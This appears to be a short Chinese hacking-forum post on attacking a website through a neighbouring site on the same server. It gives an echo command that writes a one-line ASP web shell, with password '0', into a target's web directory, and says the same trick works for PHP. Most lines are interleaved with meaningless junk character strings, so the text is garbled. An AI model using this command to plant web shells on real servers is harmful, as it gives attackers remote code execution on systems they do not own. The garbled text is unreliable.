在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。: [# h, g5 d3 u2 n- ?
; {- P0 x2 a( \' J- d# d命令格式2 L, v z' U# m% V5 I% q/ j* g) s
% E, L" M/ _( t# z7 z$ b, f4 f- e
Echo 语句 >目标站绝对目录
0 O- t& e) D4 G- d% F) R3 Y
, a5 ^! E4 b4 D: ?! J例如: / s' z, j" y1 L/ C6 l' t
8 ~$ T( B9 i7 n, techo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
0 G: d6 z4 J1 s4 A
. D$ \& s" c7 o( N( d. j; ^这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。( J) t8 T& ^7 S* S0 {, B
|